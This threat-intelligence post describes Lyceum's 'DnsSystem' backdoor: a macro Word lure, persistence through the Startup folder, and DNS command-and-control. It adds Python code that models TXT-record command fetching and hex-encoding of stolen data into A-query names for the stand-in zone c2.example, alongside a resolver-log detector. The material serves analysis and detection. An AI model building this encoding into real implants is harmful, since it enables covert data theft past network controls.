Zscaler recently reported on a new .NET DNS backdoor “DnsSystem” used by the threat actor group known as Lyceum. It is primarily used to target entities in the Middle East.
- Iranian threat actor group Lyceum is using the “DnsSystem” .NET DNS backdoor to target entities in the Middle East.
- The malware is based on the legitimate DIG.net tool.
- The malware is delivered via a maldoc.
- The malware leverages DNS hijacking.
Zscaler recently investigated a campaign in which Lyceum used a new .NET DNS backdoor known as “DnsSystem”. The backdoor is a customized version of the open-source tool DIG.net (DnsDig), a legitimate .NET DNS resolver that sends queries to a DNS server and parses the responses. The threat actors modified the code so that the same query-and-parse logic is pointed at their own DNS server: the backdoor issues DNS queries, parses the responses to obtain commands to execute, and uploads and downloads files through the C2 channel. Incoming commands arrive in TXT records; outgoing data is exfiltrated by encoding it into the names of A-record queries.
The .NET DNS backdoor is delivered via a macro-enabled malicious Word document masquerading as a news report on military affairs. The file was downloaded from http://news-spot[.]live. Once the victim enables macros, an AutoOpen() function runs and raises the brightness of an embedded image (PictureFormat.Brightness = 0.5) so that the previously obscured decoy content becomes readable, revealing the headline “Iran Deploys Drones To Target Internal Threat, Protect External Interests.”
The dropper logic lives in the document's AutoClose() function. When the document is closed, AutoClose() reads a PE file stored in one of the document's text boxes and writes it to the user's Startup folder, so the binary is launched on every login and the backdoor survives a reboot. The dropped binary is “DnsSystem”, the .NET DNS backdoor.
The malware relies on DNS hijacking: the backdoor's queries are answered by a DNS server the threat actor controls, which can return whatever records it chooses. By carrying commands and exfiltrated data inside ordinary-looking DNS lookups, the “DnsSystem” backdoor uses the DNS protocol itself as its C2 channel. This is attractive to the attacker because outbound DNS is almost always permitted and the traffic typically passes through the organization's own resolver, so no direct HTTP connection to the C2 host is ever made.
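The two halves of that channel, TXT records carrying commands in and A-record query names carrying data out, and the resolver-log detection a defender would write for it, as an added example. This is illustrative code and not Zscaler's, PolySwarm's or DnsSystem's own implementation: the zone name c2.example, the "action:argument" TXT format, the hex-chunk encoding with a sequence-number label, and the log lines are all constructed here, and the detector assumes a two-label registered zone.

```python
"""DNS-as-C2 model (TXT in, A out) and a resolver-log detector.

Added example, not Zscaler's, PolySwarm's or DnsSystem's own code: the zone
name, command format, chunk encoding and log lines are constructed here to
illustrate the pattern described in the text.
"""
import re
from collections import defaultdict

C2_ZONE = "c2.example"   # assumed attacker-controlled authoritative zone
CHUNK = 30               # raw bytes per query: 30 bytes -> 60 hex chars, under the 63-byte label limit

# --- attacker server side: commands are served as TXT records (constructed) --
TXT_COMMANDS = {f"cmd.{C2_ZONE}": "exec:whoami"}   # assumed "action:argument" format


def fetch_command(qname):
    """Implant side: a TXT lookup against the attacker's zone yields a command."""
    rdata = TXT_COMMANDS.get(qname)
    if rdata is None:
        return None
    action, _, arg = rdata.partition(":")
    return action, arg


# --- implant side: command output is exfiltrated in the labels of A queries ---
def encode_exfil(data, zone=C2_ZONE):
    """Split data into hex chunks, one per A-query name, prefixed by a sequence number."""
    names = []
    for seq, i in enumerate(range(0, len(data), CHUNK)):
        names.append(f"{seq}.{data[i:i + CHUNK].hex()}.{zone}")
    return names


def decode_exfil(qnames, zone=C2_ZONE):
    """Attacker server side: reassemble the payload from the query names it received."""
    chunks = {}
    for name in qnames:
        if name.endswith("." + zone):
            seq, label = name[: -len(zone) - 1].split(".", 1)
            chunks[int(seq)] = bytes.fromhex(label)
    return b"".join(chunks[k] for k in sorted(chunks))


# --- defender side: flag zones that look like a tunnel in resolver logs -------
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<qname>\S+) (?P<qtype>[A-Z]+)$")


def analyze_dns_log(lines, min_queries=5, min_label_len=20, min_unique_ratio=0.8):
    """Return {zone: stats} for zones receiving many long, mostly unique subdomains.

    Long labels are where encoded data has to live; a high unique-subdomain
    ratio means the queries are not repeat lookups of a handful of real hosts.
    """
    per_zone = defaultdict(lambda: {"queries": 0, "txt": 0, "subs": set(), "lens": []})
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        labels = m["qname"].rstrip(".").split(".")
        if len(labels) < 3:              # no subdomain, so nothing to carry data in
            continue
        zone, sub_labels = ".".join(labels[-2:]), labels[:-2]   # assumes a 2-label zone
        st = per_zone[zone]
        st["queries"] += 1
        st["txt"] += m["qtype"] == "TXT"
        st["subs"].add(".".join(sub_labels))
        st["lens"].append(max(len(label) for label in sub_labels))
    flagged = {}
    for zone, st in per_zone.items():
        if st["queries"] < min_queries:
            continue
        avg_len = sum(st["lens"]) / len(st["lens"])
        uniq = len(st["subs"]) / st["queries"]
        if avg_len >= min_label_len and uniq >= min_unique_ratio:
            flagged[zone] = {"queries": st["queries"], "txt": st["txt"],
                             "avg_label_len": round(avg_len, 1), "unique_ratio": round(uniq, 2)}
    return flagged


# --- constructed sample traffic -----------------------------------------------
SAMPLE_OUTPUT = b"user=admin;host=WS01;os=Windows 10;" * 4    # 140 bytes -> 5 A queries


def build_sample_log():
    """Constructed resolver log: benign lookups plus one TXT-in / A-out session."""
    lines = [f"2022-06-09T10:00:0{i}Z 10.0.0.5 www.microsoft.com A" for i in range(5)]
    lines += ["2022-06-09T10:01:00Z 10.0.0.5 cmd.c2.example TXT",
              "2022-06-09T10:05:00Z 10.0.0.5 cmd.c2.example TXT"]
    lines += [f"2022-06-09T10:01:0{i}Z 10.0.0.5 {q} A"
              for i, q in enumerate(encode_exfil(SAMPLE_OUTPUT))]
    return lines


if __name__ == "__main__":
    print(fetch_command(f"cmd.{C2_ZONE}"))          # ('exec', 'whoami')
    print(analyze_dns_log(build_sample_log()))     # flags c2.example, not microsoft.com
```

The detector is deliberately simple: it keys on label length and subdomain uniqueness rather than on any particular encoding, so it catches hex, base32 or base64 labels alike, and it counts TXT lookups separately because a zone that is both queried for TXT and flooded with unique A queries matches the command-in, data-out shape exactly. In a real deployment the two-label zone assumption should be replaced with a public-suffix lookup, and the thresholds tuned against the organization's own baseline.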
Who is Lyceum?
Lyceum, also known as Hexane, Spirlin, and Siamese Kitten, is an Iranian threat actor group active since at least 2017. The group typically targets energy and telecommunications organizations in the Middle East and Africa. Its TTPs include supply chain attacks and heavy use of .NET-based malware; its toolset includes the Shark, Milan, and DanBot backdoors, C++ backdoors, and a PowerShell script.
PolySwarm has multiple samples of Lyceum .NET DNS Backdoor “DnsSystem”.
You can use the following CLI command to search for all Lyceum .NET DNS Backdoor samples in our portal:
$ polyswarm link list -f DnsSystem